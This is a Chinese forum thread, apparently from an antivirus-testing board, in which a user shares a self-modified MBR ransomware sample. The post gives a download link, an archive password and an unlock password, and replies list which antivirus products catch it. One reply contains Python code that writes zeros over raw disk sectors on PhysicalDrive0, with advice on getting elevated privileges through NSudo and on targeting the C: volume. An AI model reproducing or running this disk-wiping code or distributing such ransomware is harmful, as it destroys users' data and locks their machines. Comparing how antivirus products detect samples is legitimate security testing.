MBR勒索

显示全部楼层 · 发表于 2023-2-5 18:37:52

本帖最后由 python无名氏于 2023-2-5 21:09 编辑

快开学了

这可能是最后一个了改了一下，勒索信息变了
https://pan.huang1111.cn/s/5qDqSl
密码：threatbook
解锁密码：1145141919810
（密码好臭(悲)）

显示全部楼层 · 发表于 2023-2-5 18:40:58

金山毒霸kill

显示全部楼层 · 发表于 2023-2-5 18:41:02

奇安信miss

显示全部楼层 · 发表于 2023-2-5 18:41:27

还以为你用Python能写出来

显示全部楼层 · 发表于 2023-2-5 18:46:03

事件: 检测到恶意对象
应用程序名称: WinRAR.exe
应用程序路径: D:\WinRAR
组件: 文件反病毒
结果说明: 检测到
类型: 木马
名称: Trojan-Ransom.Win32.Foreign.naew
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: da87951c508b1365b01cf897b7656e28fe74e94dcdadd57a178704949b34855d
对象路径: D:\Browerdownload\Compressed\MBRLocker
对象的 MD5: 295649234A333A5A73BE70231DDAB489
原因: 专家分析
数据库发布日期: 今天，2023-02-05 13:16:00

显示全部楼层 · 发表于 2023-2-5 18:51:09

本帖最后由 python无名氏于 2023-2-5 18:54 编辑

wwwab 发表于 2023-2-5 18:41
还以为你用Python能写出来

python太简单了

我二年级就已经做过了，但效果不知道咋样...(python是真的下死手，没密码，改了就回不去力)

显示全部楼层 · 发表于 2023-2-5 19:03:57

python无名氏发表于 2023-2-5 18:51
python太简单了我二年级就已经做过了，但效果不知道咋样...(python是真的下死手，没密码，改了就回 ...

Python能直接修改mbr吗

（批处理命令行没有引入别的东西应该也是修改不了mbr的吧）

不会被编译器拒绝执行敏感代码或者权限不够写入不了吗

用户锁倒是简单应该可以用os.system(net user)

显示全部楼层 · 发表于 2023-2-5 19:07:16

McAfee kill

显示全部楼层 · 发表于 2023-2-5 19:12:44

本帖最后由 python无名氏于 2023-2-5 19:28 编辑

wwwab 发表于 2023-2-5 19:03
Python能直接修改mbr吗

（批处理命令行没有引入别的东西应该也是修改不了mbr的吧）

disk = open(r'\\.\PhysicalDrive0', 'wb+')
disk.seek(512)
disk.write(b'\x00'*512) #这里也可以换成str转成的信息(str.encode('utf-8'))
disk.close()

复制代码

貌似可以，用的实体机，没试过，也不敢试

不过亲测如果是rb+以管理员身份运行是可以读取到的

如果借助类似于NSudo的工具应该就可以了，详情可以看https://blog.csdn.net/m0_72347309/article/details/125886929(还可以把\\.\PhysicalDrive0给改成\\.\C:)

显示全部楼层 · 发表于 2023-2-5 19:23:02

BEST Kill

[病毒样本] MBR勒索

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源